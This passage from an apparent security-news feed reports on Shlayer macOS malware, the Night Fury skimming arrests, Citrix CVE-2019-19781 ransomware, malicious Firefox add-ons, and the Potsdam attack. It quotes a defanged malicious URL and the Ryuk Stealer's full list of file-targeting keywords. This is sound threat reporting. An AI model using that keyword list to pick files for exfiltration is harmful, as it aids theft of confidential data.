Along with the portal, Backes said that Space ISAC intends to set up a "space systems vulnerability laboratory" for NCC analysts and ISAC members at the National Cybersecurity Center (NCC) in Colorado Springs. 

Space ISAC plans to hold its first ever summit meeting at the NCC's Cyber Symposium in Denver on June 15 and 16 of this year.

Which was the most common threat to macOS devices in 2019? Shlayer malware

Malware authors continue to show interest in macOS devices, Kaspersky experts confirmed that the Shlayer malware has been the most common threat to the macOS platform.

Security experts from Kaspersky Lab revealed that the Shlayer malware was the most widespread macOS threat in 2019.

In February, malware researchers at Carbon Black spotted a new strain of the Shlayer malware that was targeting MacOS versions from 10.10.5 up to 10.14.3.

The malware was posing as an Adobe Flash update and it was distributed through a large number of websites, fake or compromised legitimate domains.

Shlayer macOS Malware

This variant of the Shlayer malware employs multiple levels of obfuscation, experts discovered that many of the initial DMGs are signed with a legitimate Apple developer ID.

The malware installs Any Search bar on the targeted Mac device to deploy adware, it also intercepts and collects browser data and it is able to alter search results to deliver malicious ads.

According to Kaspersky, in 2019, one in ten of our Mac security solutions encountered this malware at least once.

“For close to two years now, the Shlayer Trojan has been the most common threat on the macOS platform: in 2019, one in ten of our Mac security solutions encountered this malware at least once, and it accounts for almost 30% of all detections for this OS.” reads the analysis published by Kaspersky. “The first specimens of this family fell into our hands back in February 2018, and we have since collected almost 32,000 different malicious samples of the Trojan and identified 143 C&C server domains.”

The malware was used to deliver multiple adware including AdWare.OSX.Cimpli, AdWare.OSX.Bnodlero, AdWare.OSX.Pirrit, and AdWare.OSX.Geonei.

Experts pointed out that the infection process of Shlayer malware hasn’t changed over the time and the malicious code has remained active throughout 2019.

Unlike other Bash-based macOS malware, the Shlayer family is written in Python, and its operation algorithm is different from other threats.

Shlayer is used only as the initial stage of the attack because it penetrates the system, loads the main payload, and runs it.

“The negative consequences for the user can be seen by investigating the AdWare.OSX.Cimpli family, which was being actively downloaded by the Trojan at the time of writing.” continues the report. ” But in actual fact, Cimpli performs several actions unseen by the user. First, it installs a malicious extension in Safari, hiding the OS security notification behind a malware fake window. By clicking on the buttons in the notification, the user in effect agrees to install the extension.”

The researchers detailed one of the extensions downloaded and installed by the malware that is called Management. The extension monitors user searches and redirects them to the address hxxp://lkysearchex41343-a.akamaihd[.]net/as?q=c by injecting the script script.js in the browser pages. The malicious code also loads the mitmdump tool, which is packed using PyInstaller.

Most Shlayer infection attempts were observed in the U.S. (31%), followed by Germany (14%), France (10%), and the UK (10%).

“Having studied the Shlayer family, we can conclude that the macOS platform is a good source of revenue for cybercriminals.” concludes the report. “The Trojan links even reside on legitimate resources — attackers are adept in the art of social engineering, and it is hard to predict how sophisticated the next deception technique will be.”

Pierluigi Paganini

(SecurityAffairs – Shlayer, hacking)

The post Which was the most common threat to macOS devices in 2019? Shlayer malware appeared first on Security Affairs.

Police Bust 3 Suspected Magecart Hackers in Indonesia

Operation 'Night Fury' Targets JavaScript Skimming Gangs Hitting E-Commerce Sites
Police in Indonesia have arrested three suspected members of an e-commerce hacking crew that used JavaScript sniffing code to steal customer and payment card data. The arrests came as part of Interpol's ongoing anti-skimming operation, codenamed "Night Fury," targeting hackers in southeast Asia.

From Privacy to Trust and ROI

As we embark on a new decade, data privacy has become top-of-mind for business executives and consumers worldwide.  Data breaches frequently expose the personal data of millions, and many companies have not done enough to protect themselves from intentional or unintentional misuse. While it is often hard to reach agreement on new legislation, one issue that governments around the world seem to agree on is the need to help protect the personal data of their constituents. The EU’s General Data Protection Regulation (GDPR) became enforceable in May 2018, and many countries, from China to Brazil, have updated or passed their own regulations. The new California Consumer Privacy Act (CCPA) became effective at the beginning of 2020, other states are following suit, and a U.S. Federal privacy law is now under consideration.

Insights from the Cisco Data Privacy Research Program

The Cisco Chief Privacy Office has provided groundbreaking research and insights to help organizations and consumers understand what they can and should do to keep data safe and maximize their investments in data privacy. Two years ago, we launched our Data Privacy Benchmark Study, which explored privacy maturity and investments across thousands of organizations worldwide. We found that two-thirds of organizations were experiencing significant sales delays due to customer’s data privacy concerns, but that privacy investment was minimizing those delays. Last year, we expanded our inquiry to explore a wide range of business benefits, including the connection between privacy investment and security benefits such as fewer and less costly breaches. In November, we released a companion study looking at the attitudes and behaviors of consumers worldwide.  We identified a large group we call “Privacy Actives” – that is, consumers who care about privacy, are willing to spend time or money to protect their data, and have already switched companies or providers based on their data policies.

The 2020 Data Privacy Benchmark Study and the ROI of Privacy

Today, in observance of International Data Privacy Day, I am pleased to share our 2020 Data Privacy Benchmark Study. Drawing on data from 2800 organizations in 13 countries, we have – for the first time – calculated the ROI for privacy. In addition, we updated the privacy metrics we have been tracking over several years. The study explores the value of privacy certifications in today’s market, as follows:

  • For every dollar spent on privacy, the average organization is getting $2.70 in associated benefits. We asked respondents to quantify their annual privacy investment and business benefits, and we used this to calculate their privacy ROI. Most organizations are seeing very positive returns, and over 40% are realizing at least double their investment.
  • 70% of organizations say they received significant business benefits from privacy beyond compliance. This is up from 40% last year, and includes better agility and innovation, increased competitive advantage, improved attractiveness to investors, and greater customer trust.
  • Higher accountability translates to increased benefits: Companies with higher accountability scores (as assessed using the Accountability Wheel of the Centre for Information Policy Leadership) experience lower breach costs, shorter sales delays, and higher financial returns.
  • Eighty-two percent of organizations see privacy certifications as a motivation for purchasing: Privacy certifications such as the ISO 27701 and the EU-U.S. Privacy Shield are becoming an important purchasing factor when selecting a third-party vendor.

What does this mean for organizations?

The results of this study highlight that privacy is good for business, beyond any compliance requirements. We recommend that organizations:

  • Invest in privacy beyond the legal minimum; most organizations are seeing very positive returns on their privacy spending.
  • Work to obtain external privacy certifications; these have become an important factor in the buying process.
  • Build in privacy accountability and maturity to achieve security benefits, reduced sales delays, and higher returns.

In future blogs, I will explore these results more fully, including some of the interesting differences in results across geographies and company size.


More Information

Cisco Data Privacy Benchmark Study 2020

Press Announcement Cisco Data Privacy Benchmark Study 2020 Confirms Positive Financial Benefits of Strong Corporate Data Privacy Practices

Cisco Data Privacy Benchmark Study 2020 – Infographic

Cisco 2019 Data Privacy Benchmark Study

Consumer Privacy Survey

Cisco Data Privacy

Follow Robert on Twitter @RobertWaitman


The post From Privacy to Trust and ROI appeared first on Cisco Blogs.

NY Bills Would Ban Municipalities From Meeting Ransomware Demands

Two state senators from New York State introduced bills that would ban municipalities from meeting ransomware attackers’ demands. On January 14, 2020, NYS Senator Phil Boyle of the 4th Senate District proposed Senate Bill S7246. Senator Boyle along with his cosponsors Senator George M. Borrello of the 57th Senate District and Senator Sue Serino of […]… Read More

The post NY Bills Would Ban Municipalities From Meeting Ransomware Demands appeared first on The State of Security.

Hashtag Trending – Big brother’s watch in UK; YouTube mods and PTSD; Sidewalk Lab’s smart city delay

Hashtag Today is about big brother watching over UK citizens, YouTube moderators allegedly being forced into acknowledging PTSD as a health hazard, and the delay of Sidewalk Lab’s smart city in Toronto. Thank you for tuning in to Hashtag Trending, it’s Monday, January 27th, and I’m your host, Tom Li. Trending on Google, United Kingdom…

Smartphone Election in Washington State

This year:

King County voters will be able to use their name and birthdate to log in to a Web portal through the Internet browser on their phones, says Bryan Finney, the CEO of Democracy Live, the Seattle-based voting company providing the technology.

Once voters have completed their ballots, they must verify their submissions and then submit a signature on the touch screen of their device.

Finney says election officials in Washington are adept at signature verification because the state votes entirely by mail. That will be the way people are caught if they log in to the system under false pretenses and try to vote as someone else.

The King County elections office plans to print out the ballots submitted electronically by voters whose signatures match and count the papers alongside the votes submitted through traditional routes.

While advocates say this creates an auditable paper trail, many security experts say that because the ballots cross the Internet before they are printed, any subsequent audits on them would be moot. If a cyberattack occurred, an audit could essentially require double-checking ballots that may already have been altered, says Buell.

Of course it's not an auditable paper trail. There's a reason why security experts use the phrase "voter-verifiable paper ballots." A centralized printout of a received Internet message is not voter verifiable.

Another news article.

Royal Yachting Association Resets Passwords After Breach

Royal Yachting Association Resets Passwords After Breach

The Royal Yachting Association (RYA) is forcing a password reset for all online users after warning some that their data may have been compromised by a third party.

The UK’s national body for all things nautical appears to have moved quickly in response to the discovery.

“We have recently become aware that an unauthorized party accessed and may have acquired a database created in 2015 containing personal data associated with a number of RYA user accounts. The affected information included email addresses and RYA website passwords which were encrypted and therefore not visible,” it explained.

“The affected information included name, email and hashed passwords — the majority held with the salted hash function, which is used to secure passwords. The affected data did not include any financial or payment information and in this stage in our investigation there is no evidence that this data has been misused — it was legacy test data and it appears that the unauthorized party who gained access to a hosted server subsequently deleted that database.”

Despite passwords being salted and hashed, the RYA is taking no chances and will require all web users to choose a new credential. It is also urging members to be on the lookout for potential phishing scams attempting to capitalize on the breach notification.

“Please note that any email from the RYA about this issue (subject: Important notification regarding RYA Account Security) does not contain attachments and does not request your personal data,” it clarified.

“If you receive an email about this issue which suggests you download an attachment, or asks you for information, the email was not sent by RYA and may be an attempt to steal your personal data.”

Several yachters took to an industry forum warning of such an attempt, until they were reassured that the breach notification email was genuine. Some expressed surprise at receiving the email as they aren’t RYA members, although their email address may have found its way onto the “test” database another way.

Operation Night Fury: Group-IB helps take down a cybergang behind the infection of hundreds of websites all over the world

More details emerged from the recently disclosed Operation Night Fury: Group-IB helps take down a cybergang behind the infection of hundreds of e-commerce.

Operators of the JavaScript-sniffer family, dubbed «GetBilling» by Group-IB, were arrested in Indonesia. The arrest came as a result of a joint operation «Night Fury» initiated by INTERPOL’s ASEAN Cyber Capability Desk (ASEAN Desk) that involved Indonesian Cyber Police (BARESKRIM POLRI (Dittipidsiber)) and Group-IB’s APAC Cyber Investigations Team.

The operation is still ongoing in five ASEAN countries with which the intelligence was also shared. This case marks the first successful multi-jurisdictional operation against the operators of JavaScript-sniffers in the region. According to Group-IB’s data, the suspects have managed to infect hundreds of websites in various locations, including in Indonesia, Australia, the United Kingdom, the United States, Germany, Brazil, and some other countries. Payment and personal data of thousands of online shoppers from Asia, Europe, and the Americas have been stolen.

The three suspects with the initials «ANF» (27 y.o.), «K» (35 y.o.), and «N» (23 y.o.) were arrested in December 2019 in two different regions in Indonesia — Special Region of Yogyakarta and Special Capital Region of Jakarta — as part of the joint operation «Night Fury» carried out by Indonesian Cyber Police and INTERPOL with the help of Group-IB’s Cyber Investigations team. During the special operation, Indonesian Cyber Police seized laptops, mobile phones of various brands, CPU units, IDs, BCA Token, ATM cards. The suspected operators of the GetBilling JavaScript-sniffer family are charged with the theft of electronic data, which carries up to a 10-year jail sentence in accordance with Indonesian criminal code.

“Strong and effective partnerships between police and the cybersecurity industry are essential to ensure law enforcement worldwide has access to the information they need to address the scale and complexity of today’s cyberthreat landscape. This successful operation is just one example of how law enforcement are working with industry partners, adapting and applying new technologies to aid investigations and ultimately reduce the global impact of cybercrime,» concluded Mr Jones.”

Craig Jones

Craig Jones

INTERPOL’s Director of Cybercrime

“There are many challenges and obstacles in cross-border hi-tech crime investigations like this. The Night Fury Operation showed that these obstacles could only be overcome with close collaboration between national law enforcement, international organizations and private companies. Effective multi-jurisdictional coordination of efforts between Indonesia’s Cyber Police, INTERPOL and Group-IB allowed to attribute the crimes, establish the perpetrators behind the JS-sniffer and arrest them. But more importantly to protect the community and raise public awareness about the problem of cybercrime and its impact.”

Idam Wasiadi

Idam Wasiadi

Police Superintendent, Cybercrime Investigator at Directorate of Cybercrime of CID of Indonesian National Police

“With cybercrime being a growing threat across the region, the ASEAN Desk was launched by INTERPOL to assist law enforcement agencies enhance their proactive response against cybercrime. Through this operation, it is clear that timely intelligence sharing and coordinated actions are the ways forward to effectively combat cybercrime regionally and globally.”

James Tan

James Tan

INTERPOL Acting Assistant Diector (Strategy & Capabilities Development)

JavaScript-sniffers (JS-sniffers) targeting ecommerce websites is a type of malicious JavaScript code, designed to steal customer payment and personal data such as credit card numbers, names, addresses, logins, phone numbers, and credentials from payment systems, and etc.

Group-IB has been tracking the GetBilling JS-sniffer family since 2018. The analysis of infrastructure that was controlled by the suspected operators of GetBilling arrested in Indonesia, carried out by Group-IB’s Cyber Investigations team, revealed that they have managed to infect nearly 200 websites in Indonesia, Australia, Europe, the United States, South America, and some other countries. However, the investigation in other ASEAN countries continues, and the number of websites infected with GetBilling family is likely to be higher. According to the investigation, stolen payment data was used by the suspects to buy goods, such as electronic devices or other luxury items, which they tried to resell online in Indonesia at below the market price.

Fig. 1 Example of GetBilling’s malicious script

Fig. 2 Example of stolen payment and personal data stored on GetBilling’s servers

Group-IB Cyber Investigations team determined that some of the GetBilling’s infrastructure was located in Indonesia. Upon discovery of this information, INTERPOL’s ASEAN Desk promptly notified Indonesian cyber police. Further investigation discovered that the GetBilling’s operators were not new to the world of cybercrime. To access their servers for stolen data collection and their JS-sniffers’ control, they always used VPN to hide their real location and identity. To pay for hosting services and buy new domains the gang members only used stolen cards. Despite that, Indonesian cyber police in cooperation with INTERPOL and Group-IB’s Cyber Investigations team managed to establish that the group was operating from Indonesia.

“This case showed the nature of cybercrime — the operators of the JS-sniffer lived in one country attacking websites all around the world. It makes evidence collection, identification of suspects, and prosecution more complicated. Another thing that the case demonstrated vividly is that international cooperation and cyber intelligence data exchange can help effectively tackle modern cyber threats. Thanks to Indonesian Cyber Police and INTERPOL’s prompt actions, Night Fury became the first successful multi-jurisdictional operation against the operators of JavaScript-sniffers in the APAC region. It is a great example of coordinated cross-border anti-cybercrime effort, and we are proud that our threat intelligence and digital forensics expertise helped to establish the suspects. We hope this will set a precedent for law enforcement in  jurisdiction too.”

James Tan

Vesta Matveeva

Head of Group-IB’s APAC Cyber Investigations Team

By leveraging its own infrastructure for monitoring of underground forums and cardshops, Group-IB has collected comprehensive information about the carding market and is capable of identifying various anomalies. According to Group-IB’s annual 2019 threat report, the number of compromised cards uploaded to underground forums increased from 27.1 million to 43.8 million in H2 2108-H1 2019 year-on-year. The size of the carding market, in turn, grew by 33 percent and amounted to USD 879.7 million. The sale of CVV data is also on rise today, having increased by 19 percent in the corresponding period, and one of the key reasons behind this trend could be JavaScript-sniffers.

GetBilling family was first described in Group-IB’s 2019 report «Crime without punishment» which is a deep dive into the world of JS‑sniffers. According to the author of the report Viktor Okorokov, threat intelligence analyst at Group-IB, at the time of the report’s publication, in total Group-IB Threat Intelligence team discovered 38 families of JS-sniffers. Ever since, the number of JS-sniffer families, discovered by the company, has almost doubled and continues to grow. JS‑sniffers have caused many security incidents in past — the infection of the British Airways website and mobile app, payment-card attack on the UK website of the international company FILA etc. — and continue to gain popularity among cybercriminals. Most recently, in December 2019, JS-sniffers hit the APAC infecting the websites of Singaporean fashion brand «Love, Bonito.

To avoid big financial losses due to JS-sniffers, it’s recommended for online users to have a separate pre-paid card for online payments, set spending limits on cards, used for online shopping, or even use a separate bank account exclusively for online purchases. Online merchants, in their turn, need to keep their software updated and carry out regular cybersecurity assessments of their websites.

Press release is available here.

About the author Group-IB:

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection. Group-IB is a partner of INTERPOL, Europol, and has been recommended by the OSCE as a cybersecurity solutions provider. Group-IB is a member of the World Economic Forum.   

Pierluigi Paganini

(SecurityAffairs – Operation Night Fury, hacking)

The post Operation Night Fury: Group-IB helps take down a cybergang behind the infection of hundreds of websites all over the world appeared first on Security Affairs.

Chrome and Firefox Clamp Down on Suspicious Behavior

Chrome and Firefox Clamp Down on Suspicious Behavior

Both Chrome and Firefox administrators have had to take action recently to halt the spread of malware via extensions and add-ons.

Google developer advocate Simeon Vincent explained over the weekend that the Chrome Web Store team detected an increase in fraudulent activity earlier in the month attempting to exploit users of the popular browser.

“Due to the scale of this abuse, we have temporarily disabled publishing paid items. This is a temporary measure meant to stem this influx as we look for long-term solutions to address the broader pattern of abuse,” he continued.

“If you have paid extensions, subscriptions, or in app-purchases and have received a rejection for ‘Spam and Placement in the Store’ this month, this is most likely the cause.

Extension developers will not be allowed to update their offerings while these temporary measures last. Those who want to publish an item that has been rejected are urged to reply to the rejection email and request an appeal.

“You may be asked to republish your item, at which point the review should proceed normally. You must repeat this process for each new version while this measure is in place,” said Vincent.

Unfortunately for developers, there’s no immediate end in sight for these temporary measures.

“We are working to resolve this as quickly as possible, but we do not have a resolution timeline at the moment. Apologies for the inconvenience,” concluded Vincent.

The news comes as rival browser Firefox experiences its own security issues. Mozilla administrators have begun removing scores of dodgy add-ons from the Mozilla Add-on (AMO) portal, and disabling any found in existing browser deployments.

Many of those marked for attention are thought to have been executing code from remote servers, installing malware, deliberately hiding code or eavesdropping on user searches.

Over 120 banned add-ons appear to have been published by a single developer, 2Ring, and were removed for executing remote code — which is illegal according to Mozilla’s add-on rule book.

Citrix Flaw Exploited by Ransomware Attackers

Citrix Flaw Exploited by Ransomware Attackers

Reports have emerged of multiple attempts to exploit a Citrix vulnerability, delivering ransomware to enterprise victims including a German car manufacturer.

Citrix began patching the CVE-2019-19781 bug in its Application Delivery Controller (ADC) and Citrix Gateway products last week. If successfully exploited, it could allow an unauthenticated attacker to perform arbitrary code execution.

At the time, FireEye warned that attackers were exploiting the flaw to deploy a backdoor, named “NotRobin,” in order to maintain access to exposed systems.

In an update, the security vendor claimed on Friday that it had detected efforts to deploy coin miners and ransomware via exploits for the vulnerability.

It traced attacks on dozens of FireEye customers back to ransomware named “Ragnarok,” which appears to have been created in mid-January. The ransom note demands 1 Bitcoin ($8600) to decrypt one infected machine or five ($43,002) for all.

“FireEye continues to observe multiple actors who are currently seeking to take advantage of CVE-2019-19781. This post outlines one threat actor who is using multiple exploits to take advantage of vulnerable internal systems and move laterally inside the organization,” it concluded.

“Based on our initial observations, the ultimate intent may have been the deployment of ransomware, using the Gateway as a central pivot point.”

As FireEye mentioned, there appear to be multiple groups looking to exploit the Citrix flaw in ransomware attacks.

Researchers took to Twitter to reveal efforts by attackers using the Sodinokibi variant, also known as REvil. Victims include German car parts manufacturer Gedia Automotive Group.

“I examined the files #REvil posted from Gedia after they refused to pay the #ransomware. The interesting thing I discovered is that they obviously hacked Gedia via the #Citrix exploit,” explained @underthebreach. “My bet is that all recent targets were accessed via this exploit.”

The news comes after white hats pointed to a critical unpatched flaw in Pulse Secure VPN products as being behind the Travelex ransomware outage.

Mozilla banned hundreds of malicious Firefox add-ons over the last weeks

Mozilla is intensifying the efforts to protect its users, in the last couple of weeks, the security staff has banned 200 malicious Firefox add-ons.

Over the past two weeks, Mozilla has reviewed and banned 197 Firefox add-ons because they were executing malicious code. The malicious Firefox add-ons were found stealing user data and for this reason, they were removed from the Mozilla Add-on (AMO) portal.

Mozilla also disabled the malicious add-ons in the browsers of the users who have already installed them.

The apps were using obfuscation to hide their source code and were downloading and executing code from a remote server, a behavior that violates the policy of the portal. Downloading code from a remote server could allow threat actors to execute malicious code within the browser once it will be dynamically downloaded from a server under their control.

Mozilla banned 14 Firefox add-ons ([1], [2]. [3]) because they were using obfuscated code and potentially hiding malicious code.

Most of the banned apps have been developed by 2Ring, a provider of B2B software.

Mozilla banned for the same reason six Firefox add-ons developed by Tamo Junto Caixa, and three add-ons that were fake premium products.

Mozilla also banned an unnamed add-onWeatherPool and Your SocialPdfviewer – toolsRoliTrade, and Rolimons Plus for collecting user data without consent.

The organization also banned for malicious behavior other 30 add-ons.

Firefox also reported the case of an add-on named Fake Youtube Downloader was spotted attempting to install a malware in users’ browsers.

Mozilla also banned Firefox Add-ons like EasySearch for Firefox, EasyZipTab, ConvertToPDF, and FlixTab Search were for intercepting and collecting user search terms, a behavior that violates the rules.

Pierluigi Paganini

(SecurityAffairs – Mozilla, Firefox)

The post Mozilla banned hundreds of malicious Firefox add-ons over the last weeks appeared first on Security Affairs.

A new piece of Ryuk Stealer targets government, military and finance sectors

A new piece of the Ryuk malware has been improved to steal confidential files related to the military, government, financial statements, and banking.

Security experts from MalwareHunterTeam have discovered a new version of the Ryuk Stealer malware that has been enhanced to allow its operators to steal a greater amount of confidential files related to the military, government, financial statements, and banking.

In September 2019, BleepingComputer reported the discovery of a new piece of malware that included references to the Ryuk Ransomware and that was used to steal files with filenames matching certain keywords.

It is not clear if the malware was developed by the threat actors behind Ryuk Ransomware for data exfiltration.

“It is likely the same actor with the access to the earlier Ryuk version who repurposed the code portion for this stealer,” explained the popular malware researcher Vitali Kremez.

“What we do know is that the malware is targeting very specific keywords that could be disastrous for governments, military operations, and law enforcement cases if the stolen files are exposed.” reported BleepingComputer.

The new variant of the Ryuk Stealer malware implements a new file content scanning feature and is able to search for additional keywords in the filenames for data exfiltration.

Source BleepingComputer

The variant of the Ryuk Stealer recently discovered is able to look for C++ code files (i.e. .cpp), further Word and Excel document types, PDFs, JPG image files, and also files associated with cryptocurrency wallets.

The scanning module first checks if the files on the systems have one of the above extensions, then it will check the contents of the files to verify the presence of one of the following keywords.

'personal', 'securityN-CSR10-SBEDGAR', 'spy', 'radar', 'agent', 'newswire', 'marketwired', '10-Q', 'fraud', 'hack', 'defence', 'treason', 'censored', 'bribery', 'contraband', 'operation', 'attack', 'military', 'tank', 'convict', 'scheme', 'tactical', 'Engeneering', 'explosive', 'drug', 'traitor', 'suspect', 'cyber', 'document', 'embeddedspy', 'radio', 'submarine', 'restricted', 'secret', 'balance', 'statement', 'checking', 'saving', 'routing', 'finance', 'agreement', 'SWIFT', 'IBAN', 'license', 'Compilation', 'report', 'secret', 'confident', 'hidden', 'clandestine', 'illegal', 'compromate', 'privacy', 'private', 'contract', 'concealed', 'backdoorundercover', 'clandestine', 'investigation', 'federal', 'bureau', 'government', 'security', 'unclassified', seed', 'personal', 'confident', 'mail', 'letter', 'passport', 'victim', 'court', 'NATO', 'Nato', 'scans', 'Emma', 'Liam', 'Olivia', 'Noah', 'William', 'Isabella', 'James', 'Sophia', 'Logan', 'Clearance'

In addition, the stealer will also check the presence of one of other 55 keywords in the filenames.

Once the document has passed the checks, it will be uploaded to an FTP site, experts pointed out that the code of the Ryuk stealer includes two FTP sites. At the time of the analysis, both sites were not reachable at the time of the analysis.

Targeted keywords in the new variant of the Ryuk stealer confirm that attackers are looking for confidential information in military, banking, finance and law enforcement.

Another aspect to consider is that operators behind ransomware are also interested in stealing sensitive data from their victims and use them to blackmail victims and force them to pay the ransom like the Maze ransomware gang does.

Pierluigi Paganini

(SecurityAffairs – Ryuk stealer, hacking)

The post A new piece of Ryuk Stealer targets government, military and finance sectors appeared first on Security Affairs.

Recommendations for navigating the dynamic cybercrime landscape

In this interview, Mark Sangster, VP & Industry Security Strategist at eSentire, talks about the most pressing issues CISOs are dealing with in today’s fast-fast paced threat environment. How has the cybersecurity threat landscape evolved in the past 5 years? What are some of the most notable threats eSentire is seeing that were not an issue in the past? The past five years have seen significant progress in both the recognition of cybercrime, but also … More

The post Recommendations for navigating the dynamic cybercrime landscape appeared first on Help Net Security.

You can upgrade Windows 7 for free! Why wouldn’t you?

“Doomsday is here! The sky is falling! Windows 7 is out of support and all hell will break loose!” – or, at least, that’s what some cybersecurity experts and press outlets want you to think. In this article, I will offer some advice to businesses of all sizes that may need to continue using Windows 7, while understanding the risk. This is my opinion and should be taken as advice only. Every company is different, … More

The post You can upgrade Windows 7 for free! Why wouldn’t you? appeared first on Help Net Security.

Patients believe stronger privacy protections are more important than easier health data access

Patients and consumers deserve better access to personalized, actionable health care information to empower them to make better, more informed decisions – but it should not drive up health care costs or compromise the privacy of their personal health data, according to a poll of patients and consumers from Morning Consult and America’s Health Insurance Plans (AHIP). Personal privacy outweighs increased transparency A strong majority (62%) of patients want their data and privacy protected more … More

The post Patients believe stronger privacy protections are more important than easier health data access appeared first on Help Net Security.

Top 10 policy trends to watch for globally in 2020

The 10 top trends that will drive the most significant technological upheavals this year have been identified by Access Partnership. “Shifts in tech policy will disrupt life for everyone. While some governments try to leverage the benefits of 5G, artificial intelligence, and IoT, others find reasons simply to confront Big Tech ranging from protectionism to climate urgency. “Techlash trends highlighted in our report lay bare the risks of regulatory overreach: stymied innovation and economic growth … More

The post Top 10 policy trends to watch for globally in 2020 appeared first on Help Net Security.

Who Are the Digital Service Providers (DSP) under the NIS Directive?

In a previous article, we discussed what the NIS Directive is. The European Union developed the Directive in response to the emerging cyber threats to critical infrastructure and the impact cyber-attacks have on society and the European digital market. The NIS Directive sets three primary objectives: to improve the national information security capabilities of the […]… Read More

The post Who Are the Digital Service Providers (DSP) under the NIS Directive? appeared first on The State of Security.

Grandstream launches two new additions to its GWN series of Wi-Fi Access Points

Grandstream, connecting the world since 2002 with award-winning unified communication solutions, announced the release of the two newest additions to their GWN series of Wi-Fi Access Points. The new GWN7602 is a 2×2 802.11ac Wi-Fi AP with an integrated Ethernet switch that supports 100-meter wireless coverage range and up to 80 concurrent Wi-Fi clients. Additionally, Grandstream released the GWN7630LR, a new outdoor long-range 4×4 802.11ac Wi-Fi AP that supports 300-meter coverage range, 200+ concurrent clients, … More

The post Grandstream launches two new additions to its GWN series of Wi-Fi Access Points appeared first on Help Net Security.

Swimlane version 10.0: Reducing mean time to detect and response for security incidents

Swimlane, an independent leader in security orchestration, automation and response (SOAR), announced the release of Swimlane version 10.0. The newest release has yielded up to 35X performance improvement in alarm ingestion rates and up to a 60X improvement in search query response and display rates. Both achievements set new benchmarks for SOAR platforms, significantly reducing mean time to detect (MTTD) and response (MTTR) for security incidents. “Today’s Security Operations Centers (SOC) are understaffed, overworked and … More

The post Swimlane version 10.0: Reducing mean time to detect and response for security incidents appeared first on Help Net Security.

Fugue’s engineer empowerment and education as growth strategy in 2020

Fugue, the company empowering engineers to build and operate secure cloud systems, cites product innovation, growing awareness of cloud misconfiguration risk, and the engineer-led movement to address cloud security with engineering solutions as its primary drivers for growth in 2019. In the past year, the company introduced several innovations to its award-winning cloud security product, gained significant new customers, and contributed two new open source projects for cloud infrastructure policy as code tooling. Engineer empowerment … More

The post Fugue’s engineer empowerment and education as growth strategy in 2020 appeared first on Help Net Security.

Adaptiva expands executive team in preparation for upcoming product launches

Adaptiva, a leading, global provider of endpoint management and security solutions for enterprise customers, announced strong financial results for 2019 along with significant expansion of its executive team in preparation for upcoming product launches and rapid growth in 2020, multiple award wins, and impressive scores in customer satisfaction metrics. Adaptiva’s customer growth and profitability continued to accelerate, and the company continued to see very strong growth of recurring license revenue in 2019. Business associated with … More

The post Adaptiva expands executive team in preparation for upcoming product launches appeared first on Help Net Security.

CloudKnox Security raises $12M to accelerate customer growth and innovation

CloudKnox Security, a leader in identity authorization for hybrid and multi-cloud environments, announced that it closed $12M in a new round of funding. Led by Sorenson Ventures with participation from early investors, including ClearSky Security, Dell Technologies Capital and Foundation Capital, the round brings CloudKnox’s total funding to $22.75M. The investment will be used to further accelerate the company’s product and go-to-market plans. CloudKnox also announced several key additions to the company’s board and executive … More

The post CloudKnox Security raises $12M to accelerate customer growth and innovation appeared first on Help Net Security.

White Ops appoints Dr. Russell Handorf to Principal Threat Intelligence Hacker

White Ops, the global leader in bot mitigation, verifying the humanity of more than 1 trillion digital interactions per week, announced the appointment of Dr. Russell Handorf, former Computer Scientist with the FBI, to Principal Threat Intelligence Hacker. In his new role, Dr. Handorf will lead investigations and operations into dark corners of the open, deep, and dark net to uncover and detail the workings of cybercriminals in an effort to protect White Ops customers—and … More

The post White Ops appoints Dr. Russell Handorf to Principal Threat Intelligence Hacker appeared first on Help Net Security.

City of Potsdam offline following a cyberattack

The City of Potsdam suffered a major cyberattack that took down its servers earlier this week, but emergency services were not impacted.

The German City of Potsdam has suffered a major cyberattack that took down its servers earlier this week, the good news is that emergency services, including the city’s fire department fully operational and payments were not affected.

Potsdam is the capital and largest city of the German federal state of Brandenburg. It directly borders the German capital, Berlin, and is part of the Berlin/Brandenburg Metropolitan Region

The intrusion into the Potsdam administration’s servers was discovered on Tuesday, and on Wednesday evening systems were disconnected from the Internet to contain the infection and prevent data exfiltration.

“The state capital Potsdam has switched off the administration’s internet connection and is therefore no longer accessible by email.” reads the advisory published by the City of Potsdam.

“We put our systems offline for security reasons, because we have to assume an illegal cyber attack,” said Mayor Mike Schubert. “We are working flat out to ensure that the affected administration systems are switched on again as soon as possible and that we can work safely again. In the meantime, we ask for your patience in all matters relating to the citizen service facilities, ” “We put our systems offline for security reasons, because we have to assume an illegal cyberattack,”

The IT staff noticed “numerous inconsistencies” in central access to the capital of the state. Experts noticed a system of an external provider that was attempting to retrieve data from the state capital from outside without authorization or to install malware. 

The City of Potsdam hired external IT security companies and IT forensic experts to investigate the attack.

The state capital has filed criminal charges against unknown individuals and notified the incident to the regional offices responsible for IT security and data protection.

The City published an update that announced that Postdam’s administration is not able to receive emails from outside and any incoming emails won’t be forwarded either.

Citizens could contact the City by calling the Potsdam administration staff on the phone or submitting their applications in writing by post.

“After switching off the Internet connection of the state capital Potsdam, the citizen service of the state capital Potsdam is currently only of limited use.” reads the update. “The administration can currently not receive emails from outside and incoming emails are also not forwarded. For this reason, it is necessary for citizens to submit all applications in writing to the administration by post. The employees are still available by phone for questions. “

The City of Potsdam did not provide details on the attack, but German journalist Hanno Böck reported that Citrix ADC servers on the administration’s network are affected by the CVE-2019-19781 vulnerability.

Citrix started addressing CVE-2019-19781 vulnerability in Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix SD-WAN WANOP appliances.

Pierluigi Paganini

(SecurityAffairs – Potsdam, hacking)

The post City of Potsdam offline following a cyberattack appeared first on Security Affairs.